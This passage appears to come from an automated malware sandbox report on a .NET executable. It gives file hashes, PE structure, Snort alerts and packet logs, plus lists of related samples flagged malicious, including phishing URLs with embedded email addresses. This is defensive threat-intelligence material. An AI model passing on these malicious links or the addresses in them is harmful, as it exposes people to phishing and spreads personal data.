                                                                      • 160.121.132.40
                                                                      mp0nMsMroT.exeGet hashmaliciousBrowse
                                                                      • 155.159.203.193
                                                                      SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.20877.rtfGet hashmaliciousBrowse
                                                                      • 155.159.203.193
                                                                      01d07.exeGet hashmaliciousBrowse
                                                                      • 160.122.212.17
                                                                      GOOGLEUSvOKMFxiCYt.exeGet hashmaliciousBrowse
                                                                      • 34.102.136.180
                                                                      com.fdhgkjhrtjkjbx.model.apkGet hashmaliciousBrowse
                                                                      • 216.58.212.163
                                                                      http://www.portal.office.com.s3-website.us-east-2.amazonaws.com#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                                      • 172.217.16.193
                                                                      https://storage.googleapis.com/storesll0f4bb6d9b7f964569155d2bb42628/a83416219a20d87f4dabde9f057f93b5.html#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                                      • 172.217.16.193
                                                                      https://docs.google.com/document/d/e/2PACX-1vS19QxlBmfgZPBsUyM3LjkhvVA-TJ0Z_P3J8f_cqg7VN4_zRcrthLeTjZzAubcBh9YWnC0ty3FtmofH/pubGet hashmaliciousBrowse
                                                                      • 172.217.16.193
                                                                      https://sites.google.com/site/id500800931/googledrive/share/downloads/storage?FID=6937265496484Get hashmaliciousBrowse
                                                                      • 172.217.16.193
                                                                      https://docs.google.com/document/d/e/2PACX-1vSF_0NxJ4W_JaHZNaHV7imTfN6FtP563leR3WEEVqre35gDV9YM55P9l-6Y-B1gmL7J7GW--QSF89LQ/pubGet hashmaliciousBrowse
                                                                      • 172.217.16.193
                                                                      https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-usGet hashmaliciousBrowse
                                                                      • 172.217.23.161
                                                                      http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1Get hashmaliciousBrowse
                                                                      • 172.217.21.195
                                                                      https://bit.ly/35MTO80Get hashmaliciousBrowse
                                                                      • 172.217.23.161
                                                                      Order List.xlsxGet hashmaliciousBrowse
                                                                      • 34.102.136.180
                                                                      BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                                      • 35.230.2.159
                                                                      http://global.krx.co.kr/board/GLB0205020100/bbs#view=649Get hashmaliciousBrowse
                                                                      • 108.177.15.155
                                                                      Purchase Order 40,7045$.exeGet hashmaliciousBrowse
                                                                      • 34.102.136.180
                                                                      invoice.exeGet hashmaliciousBrowse
                                                                      • 34.102.136.180
                                                                      TR-D45.pdf.exeGet hashmaliciousBrowse
                                                                      • 34.102.136.180
                                                                      knitted yarn documents.exeGet hashmaliciousBrowse
                                                                      • 172.253.120.109
                                                                      86dXpRWnFG.exeGet hashmaliciousBrowse
                                                                      • 34.102.136.180
                                                                      https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.phpGet hashmaliciousBrowse
                                                                      • 172.217.16.130
                                                                      b0408bca49c87f9e54bce76565bc6518.exeGet hashmaliciousBrowse
                                                                      • 74.125.34.46
                                                                      CLOUDFLARENETUShttp://www.portal.office.com.s3-website.us-east-2.amazonaws.com#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      https://storage.googleapis.com/storesll0f4bb6d9b7f964569155d2bb42628/a83416219a20d87f4dabde9f057f93b5.html#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      ARjQJiNmBs.exeGet hashmaliciousBrowse
                                                                      • 104.18.88.101
                                                                      1piS4PBvBp.exeGet hashmaliciousBrowse
                                                                      • 104.18.88.101
                                                                      https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-usGet hashmaliciousBrowse
                                                                      • 104.26.9.44
                                                                      New Order.exeGet hashmaliciousBrowse
                                                                      • 104.23.98.190
                                                                      PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                      • 104.16.155.36
                                                                      https://eagleeyeproduce-my.sharepoint.com/:o:/p/mckrayp/EtopxtQDn3pOqhvY4g_gG3ABKX9ornSoGNhGOLlXyaU89Q?e=Ee0wW2Get hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      https://certified1.box.com/s/2ta9r7cyn5g09fblryd9xqqpnfxbjqejGet hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      Report.464129889.docGet hashmaliciousBrowse
                                                                      • 104.28.21.160
                                                                      SecuriteInfo.com.Trojan.PWS.StealerNET.67.29498.exeGet hashmaliciousBrowse
                                                                      • 104.28.29.208
                                                                      http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1Get hashmaliciousBrowse
                                                                      • 104.18.27.190
                                                                      https://ubereats.app.link/cwmLFZfMz5?%243p=a_custom_354088&%24deeplink_path=promo%2Fapply%3FpromoCode%3DRECONFORT7&%24desktop_url=tracking.spectrumemp.com/el?aid=8feeb968-bdd0-11e8-b27f-22000be0a14e&rid=50048635&pid=285843&cid=513&dest=overlordscan.com/cmV0by5tZXR6bGVyQGlzb2x1dGlvbnMuY2g=%23#kkowfocjoyuynaip#Get hashmaliciousBrowse
                                                                      • 104.24.97.83
                                                                      https://hastebin.com/raw/xatuvoxixaGet hashmaliciousBrowse
                                                                      • 104.24.126.89
                                                                      https://bit.ly/35MTO80Get hashmaliciousBrowse
                                                                      • 104.31.69.156
                                                                      Order List.xlsxGet hashmaliciousBrowse
                                                                      • 104.24.122.89
                                                                      USD55,260.84_PAYMENT_ADVICE_NOTE_FROM_20.11.2020.EXEGet hashmaliciousBrowse
                                                                      • 162.159.133.233
                                                                      Request for quotation.xlsxGet hashmaliciousBrowse
                                                                      • 172.67.181.41
                                                                      MV TBN.exeGet hashmaliciousBrowse
                                                                      • 104.28.5.151
                                                                      PO 20-11-2020.ppsGet hashmaliciousBrowse
                                                                      • 172.67.22.135
                                                                      SQUARESPACEUSvOKMFxiCYt.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      kayx.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.141
                                                                      BANK ACCOUNT INFO!.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      http://WWW.ALYSSA-J-MILANO.COMGet hashmaliciousBrowse
                                                                      • 198.185.159.141
                                                                      Payment Advice - Advice Ref GLV823990339.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      baf6b9fcec491619b45c1dd7db56ad3d.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.177
                                                                      http://f69e.engage.squarespace-mail.comGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      NEW PO.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.141
                                                                      p8LV1eVFyO.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.177
                                                                      dB7XQuemMc.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      hRVrTsMv25.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144
                                                                      NzI1oP5E74.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      IQtvZjIdhN.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.177
                                                                      PO.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      148wWoi8vI.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.177
                                                                      H4A2-423-EM154-302.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.141
                                                                      KZ7qjnBlZF.exeGet hashmaliciousBrowse
                                                                      • 198.49.23.141
                                                                      scnn7676766.exeGet hashmaliciousBrowse
                                                                      • 198.185.159.144

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      No created / dropped files found

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.8534634080579835
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:NQQWym075C.exe
                                                                      File size:552960
                                                                      MD5:bf75ed61e1b1f7b310ec1d999077c4dd
                                                                      SHA1:cdced77e176e38ff459cdea08941de26861647cd
                                                                      SHA256:69357684ec8f83d428d2030db5f3d586718207e86457465e7fd37b3b4b7c4db2
                                                                      SHA512:d2fa7f6e1e41bebedbdba492a163b8388f2326b92d939e9352c32f5be5a311bb75e4374524b2b314b5a426763113935e00f4c81aacc26ed08e9c9dd356dd7510
                                                                      SSDEEP:12288:iYHsi433VV/WKmD8UT9Qw4RB07JglwNtAyYtoUqqwyniC:7Hs73NmD/6w4yOwrC9qgi
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Wt._.................h............... ........@.. ..............................p.....@................................

                                                                      File Icon

                                                                      Icon Hash:00828e8e8686b000

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x48868e
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                      Time Stamp:0x5FB77457 [Fri Nov 20 07:46:31 2020 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:v4.0.30319
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x886400x4b.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x8a0000x242.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x8c0000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x866940x86800False0.902309261733data7.85956112401IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x8a0000x2420x400False0.310546875data3.56952524932IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x8c0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      RT_MANIFEST0x8a0580x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Network Behavior

                                                                      Snort IDS Alerts

                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                      11/20/20-20:13:59.024360TCP1201ATTACK-RESPONSES 403 Forbidden804972834.102.136.180192.168.2.3
                                                                      11/20/20-20:14:04.252129TCP1201ATTACK-RESPONSES 403 Forbidden804973034.102.136.180192.168.2.3
                                                                      11/20/20-20:14:09.492539TCP1201ATTACK-RESPONSES 403 Forbidden804973123.227.38.64192.168.2.3
                                                                      11/20/20-20:15:02.891478TCP1201ATTACK-RESPONSES 403 Forbidden804974435.186.238.101192.168.2.3
                                                                      11/20/20-20:15:13.160153TCP1201ATTACK-RESPONSES 403 Forbidden804974534.102.136.180192.168.2.3

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 20, 2020 20:13:47.553219080 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.686038971 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.686278105 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.686299086 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.821281910 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824301004 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824321985 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824343920 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824366093 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824382067 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824397087 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824414968 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824433088 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.824434042 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824450016 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824465036 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.824498892 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.824779987 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.957201004 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957236052 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957262039 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957285881 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957298994 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.957326889 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.957753897 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957788944 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957815886 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957834005 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.957839966 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957864046 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957880020 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.957886934 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957911968 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957928896 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.957936049 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957959890 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.957984924 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.958003998 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.958013058 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.958031893 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.958036900 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.958061934 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.958076000 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.958086014 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.958110094 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.958133936 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:47.958134890 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:47.958353043 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.089970112 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090013027 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090038061 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090060949 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090070963 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090084076 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090110064 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090137005 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090148926 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090163946 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090183973 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090274096 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090281963 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090629101 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090656042 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090675116 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090678930 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090703964 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.090722084 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.090804100 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091305017 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091332912 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091353893 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091358900 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091388941 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091394901 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091415882 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091428995 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091442108 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091463089 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091469049 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091494083 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091494083 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091515064 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091521025 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091538906 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091546059 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091564894 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091573000 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091589928 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091600895 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091619968 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091628075 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091645002 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091653109 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091675043 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091676950 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091701031 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091701984 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091727018 CET8049726198.49.23.141192.168.2.3
                                                                      Nov 20, 2020 20:13:48.091727018 CET4972680192.168.2.3198.49.23.141
                                                                      Nov 20, 2020 20:13:48.091747999 CET4972680192.168.2.3198.49.23.141

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 20, 2020 20:12:56.247581005 CET6015253192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:12:56.290533066 CET53601528.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:12:57.004048109 CET5754453192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:12:57.030999899 CET53575448.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:12:57.707721949 CET5598453192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:12:57.734718084 CET53559848.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:12:58.612056971 CET6418553192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:12:58.639239073 CET53641858.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:01.014048100 CET6511053192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:01.049793959 CET53651108.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:01.685911894 CET5836153192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:01.713012934 CET53583618.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:02.408107996 CET6349253192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:02.435436010 CET53634928.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:03.399342060 CET6083153192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:03.426584959 CET53608318.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:04.106293917 CET6010053192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:04.133712053 CET53601008.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:04.816602945 CET5319553192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:04.843772888 CET53531958.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:05.492518902 CET5014153192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:05.528096914 CET53501418.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:06.437241077 CET5302353192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:06.464438915 CET53530238.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:07.553205013 CET4956353192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:07.580269098 CET53495638.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:08.548835039 CET5135253192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:08.575948954 CET53513528.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:09.305170059 CET5934953192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:09.342957973 CET53593498.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:25.557703018 CET5708453192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:25.597769022 CET53570848.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:34.530728102 CET5882353192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:34.557849884 CET53588238.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:43.661276102 CET5756853192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:43.696640015 CET53575688.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:47.504547119 CET5054053192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:47.546031952 CET53505408.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:53.098772049 CET5436653192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:53.304198980 CET53543668.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:13:58.849778891 CET5303453192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:13:58.889568090 CET53530348.8.8.8192.168.2.3
                                                                      Nov 20, 2020 20:14:04.044615984 CET5776253192.168.2.38.8.8.8
                                                                      Nov 20, 2020 20:14:04.062829018 CET5543553192.168.2.38.8.8.8
